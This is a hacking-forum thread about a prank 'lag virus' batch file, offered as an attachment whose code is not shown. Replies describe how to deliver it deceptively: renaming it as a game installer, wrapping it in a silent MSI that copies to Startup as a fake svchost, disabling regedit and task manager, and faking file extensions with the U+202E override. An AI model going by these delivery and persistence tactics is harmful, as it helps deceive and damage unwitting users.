Untagged Release Awesome Mildy harmlus virus [DL]

Zin

Expert
Reaction score
OK this is pretty cool to troll people its a simple .bat script i made i seem to enjoy using note pad to make this stuff

So what is this? this is the LAG VIRUS

Warning do not open the script it works fine and will lag you than it will crash you

How you should use it well make a file and like you can edit the icon to make it look nice than rename it like Z0beit installer than they be like "huh looks fine know one else has this" (gets fcked)

And also check out this other thing related Topic2165.html

[attachment=0:2ridru9b]<!-- ia0 Lagger.rar<!-- ia0 [/attachment:2ridru9b]

Attachments

• Lagger.rar
    221 bytes · Views: 64

xzytro

God
Reaction score
download bat 2 exe converter, with that program you can put icon for it, and you can set it as working in the background. so it will not spam the pc but the pc will get slower and slower.

also what more you can do ? you can turn it into a silent .msi installer package, which extracts itself into Startup folder as hidden, and you can change icon of the silent msi installer into a different thing, like msn icon. And put it into Startup folder. So the victim pc will always work slow as soon as the pc opens.

Tried it in my high school times, worked like charm, you should try it out.

Zin

Expert
Reaction score
Thanks for advice il add to this to my projectZin virus to make it not so suspicious im learning stuff like ghost text and anoying pop ups with sound but i think it should already be unable to stop because of the mas of lag

Btw it runs on notepad that is a default program installed on your computer so basicly all the script is doing is opening loads of notepad documents that will cause lag. i will edit this soon so it will infect the computer like you said about .msi il look into it

.silent

Reaction score
Converting batch to exe is the shittest thing possible :D :D:D
You cant really compile a bat file, all the compilers you can see are just keeping the .bat file code inside and when started they create a bat file with that code in Temp folder, then they start it.

Even if your bat compiled to exe has the most badass command to delete some files from your system, you can easily get the real code without letting it delete the files. Just need to launch it in some debugger like OllyDbg and step into until you see the path to the original bat file, then you just go to the location & open it.

Zin

Expert
Reaction score
oh and p.s i might put a youranidotvirus in it

Zin

Expert
Reaction score
when i convert it to an exe will all the commands be the same

xzytro

God
Reaction score
it will do the same thing. Just it will be .exe file, and it will run ms-dos commands from inside.

By the way if the .bat file contains cls command etc then the exe file will open a black cmd screen and do the work. To make it not open any windows, just choose option of silent installation, it will then both copy itself inside a folder, also at the same time it will keep creating notepads.

But this is ... out of logic for me. Why making it a "notepad" ? Make it something out of the view, like uhm... doing ping to localhost from hundreds of invisible cmd windows right? At least his ping will be like bawz, and he will not understand easily if you also install what he wants.

My old way was like this :

I downloaded an MSI installer setup maker program, and downloaded msn live setup (which was alive back then, 6 years ago). Then, made a .bat file doing some bad stuffs like removing all the extensions into zero, and turned it into .exe file called scvhost.exe (which was getting mixed with the original file from XP called svchost.exe). Then, started to use the setup maker program, injected the msn live setup inside the MSI installer from configurations, and also i've put the fake scvhost.exe inside the MSI package too. And from it's configurations, i set it as "copy the following file into directory :" for the startup directory which i don't remember anymore since it was Windows XP. Then i chose the fake file for it. And for the msn live setup, made it run the file without any problems, so the guy installing it will think it's safe. But after restart, ouf, lags lags and .exe files don't work anymore and ctrl + alt + del doesn't work, regedit doesn't work, gpedit doesn't work. He had to tell it to the teacher and the teacher blamed him for installing virus from bad links and forced him to re-format the pc on his own :lol: :lol::lol:

Well yeah that's the story. You might use it.

Zin

Expert
Reaction score
Well the next virus im making is gonna be like this [youtube:lm3rjcc5]http://www.youtube.com/watch?v=Rm_zlTIe_lI[/youtube:lm3rjcc5]

the video looks fake but its possible to make some of that stuff

Pabloko

Reaction score
what a nub bullshit! hey kiddo, when you want to troll your parents, open the "Character library" from windows, and copy the character U+202E.

4qKXz.png

Then goto where your noob "virus" is and press F2 to rename it.

Paste the character BEFORE the dot and write a new file extension BACKWARDS, if you want to use pdf, write fdp.

This will end the file as nametab.pdf

4qL9r.jpg

If you use an exe you can change the icon. so profit

you now can scary your classmates
2UE1cere_normal

Zin

Expert
Reaction score
Dont you get the point of the virus if i want to troll my parents i use remote shutdown not some keyboard changer
and i dont find it a noob virus your the noob probably opening the file.
I would say your spamming like a little bitch right now why dont you go double post bell end

Pabloko

Reaction score
I use ubuntu so your shitty bat opens with gedit and you confirmed your nub skills telling that ive posted a keyboard changer since its a rare and semi-unknown windows/mac bug that have persisted a lot of years.

Get back to college and learn the lesson ktxbai

Zin

Expert
Reaction score
haha very fun whats so special about a rare bug.
Im not interested in your stupid bullshit. realy a low-life flaming a newbie scripter's release
why dont you take the time to learn something in life rather than being a stupid internet dick. now realy wanna tell people about this post it in small talk or general help, is this post general help or smalltalk no its a release now please go away.